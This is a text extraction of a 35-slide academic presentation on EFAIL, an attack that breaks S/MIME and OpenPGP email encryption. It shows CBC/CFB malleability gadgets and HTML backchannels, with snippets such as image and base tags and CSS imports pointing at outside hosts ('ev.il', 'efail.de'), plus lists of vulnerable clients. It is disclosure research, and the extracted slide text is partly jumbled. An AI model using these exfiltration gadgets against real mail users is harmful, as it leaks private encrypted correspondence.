View the Slides

View the Slides

EFAIL BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS [email protected] | https://www.efail.de 1 Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Münster University of Applied Sciences 2 Ruhr University Bochum Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 3 NXP Semiconductors 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 1 Motivation for email encryption Nation state attackers • Massive collection of emails • Snowden revelations on pervasive surveillance Breach of email provider / email account • Single point of failure • Aren’t they reading / analyzing my emails anyway? Insecure transport • TLS might be used – we don’t know in advance! 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 2 Email e2e encryption TWO COMPETING STANDARDS OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi root trust hierarchies 3 Security of email encryption Request/response protocols Email is non-interactive ? 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 4 Backchannel techniques Forcing an email client to send responses via backchannels • HTML/CSS <Dispositionimg src="http://efail.de-Notification-To">: [email protected] • Email header <Remoteobject -dataAttachment="ftp://efail.de-URL: http://efail.de"> <style>@importX-Image-URL: http://efail.de '//efail.de'</style> • Attachment preview ...…PDF, SVG, VCards, etc. OCSP, CRL, intermediate certs • Certificate verification 5 Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail Thunderbird KMail Claws Linux Evolution Trojitá Mutt User interaction macOS Apple Mail Airmail40/47MailMate clients have No user interaction Mail App CanaryMail Outlook iOS backchannels requiring Leak via bypass K-9 Mail MailDroid Android R2Mail Nineno user interaction Javascript execution GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail Outlook.com iCloud HushMail FastMail Mailfence ZoHo Mail Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile 6 Attacker model 7 S/MIME 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 8 Malleability of CBC C0 C1 C2 decryption decryption P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 9 Malleability of CBC C0 C1 C2 0 0 1 0 1 0 1 0 decryption decryption 1 1 1 1 1 1 1 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 10 Malleability of CBC C0 C1 C2 0 1 1 0 1 0 1 0 decryption decryption 1 1 1 1 1 1 1 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 11 Malleability of CBC C0 C1 C2 0 1 1 0 1 0 1 0 decryption decryption 1 0 1 1 1 1 1 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 12 Malleability of CBC C0 C1 C2 0 1 1 1 1 0 1 0 decryption decryption 1 0 1 1 1 1 1 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 13 Malleability of CBC C0 C1 C2 0 1 1 1 1 0 1 0 decryption decryption 1 0 1 0 1 1 1 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 14 Malleability of CBC C0 C1 C2 0 1 1 1 1 0 0 0 decryption decryption 1 0 1 0 1 1 1 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 15 Malleability of CBC C0 C1 C2 0 1 1 1 1 0 0 0 decryption decryption 1 0 1 0 1 1 0 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 16 Malleability of CBC C0 C1 C2 0 1 1 1 1 0 0 0 ? decryption decryption 1 0 1 0 1 1 0 1 P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 17 Malleability of CBC C0 C1 C2 decryption decryption Content-type: te xt/html\nDear Bob P0 P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 18 Malleability of CBC C0' C1 C2 decryption decryption Zontent-type: te xt/html\nDear Bob P0' P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 19 Malleability of CBC C0 ⊕ P0 C1 C2 decryption decryption 0000000000000000 xt/html\nDear Bob P0' P1 CBC Gadget 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 20 Malleability of CBC C0 ⊕ P0 ⊕ Pc C1 C2 decryption decryption <img src=”ev.il/ xt/html\nDear Bob P0' P1 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 21 Malleability of CBC C0 C1' C2 decryption decryption Content-type: te Zt/html\nDear Bob P0' P1' 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 22 Malleability of CBC C0 C1' C2 decryption decryption ???????????????? Zt/html\nDear Bob P0' P1' 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 23 Attacking S/MIME No MAC 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 24 Attacking S/MIME PRACTICAL ATTACK AGAINST S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <base " ???????????????? " href="http:"> ???????????????? <img " ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi ???????????????? "> Changing Duplicating Reordering 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 25 Practical attack against S/MIME ATTACKER MODEL 26 OpenPGP 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 27 Attacking OpenPGP DIFFERENCES TO S/MIME • OpenPGP uses a variation of CFB-Mode • OpenPGP defines primitives for integrity protection • Plaintext compression is enabled by default Ci Ci+1 Ci X encryption encryption encryption encryption ? ? ? ? ? ? ? ? random plaintext Pi (known) Pi-1 Pc (chosen) 28 Attacking OpenPGP DEFEATING INTEGRITY PROTECTION Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 OutlookMDC 2010 strippedGPG4WINMDC incorrect SEIP -> SE Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 29 Attacking OpenPGP RFC 4880 ON MODIFICATION DETECTION CODES 30.08.2018 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 30 OpenPGP COMPRESSION (DEFLATE) • Challenge: create chosen compressed plaintext • We present a solution for this in the paper • In a nutshell: • Our shortest exploit needs 11 bytes of known plaintext • The first 4 bytes are known header data • Remaining 7 bytes have to be guessed ? ? ? ? ? ? ? 31 OpenPGP GUESSING BYTES IN COMPRESSION PGP-encrypted Facebook password recovery • 211 guesses to break every email PGP-encrypted Enron dataset • 500 guesses to break 41% of the emails Multiple guesses per email possible • Up to 1.000 MIME parts per email 32 33 Impact on the standards CURRENT DRAFTS S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends usage of authenticated encryption OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets (due to downgrade attack) • Proposes chunk size limits for AEAD protected data packets • Implementations should not allow users to access modified plaintexts 34 Conclusions • Introduced malleability gadgets Thank you! • Self-exfiltrating plaintexts Questions? • Evaluation of backchannels • Crypto standards need to evolve • Current S/MIME is broken • OpenPGP needs clarification • Secure HTML email is challenging https://www.efail.de/ 35.

View Full Text

Details

  • File Type
    pdf
  • Upload Time
    -
  • Content Languages
    English
  • Upload User
    Anonymous/Not logged-in
  • File Pages
    35 Page
  • File Size
    -

Download

Channel Download Status
Express Download Enable

Copyright

We respect the copyrights and intellectual property rights of all users. All uploaded documents are either original works of the uploader or authorized works of the rightful owners.

  • Not to be reproduced or distributed without explicit permission.
  • Not used for commercial purposes outside of approved use cases.
  • Not used to infringe on the rights of the original creators.
  • If you believe any content infringes your copyright, please contact us immediately.

Support

For help with questions, suggestions, or problems, please contact us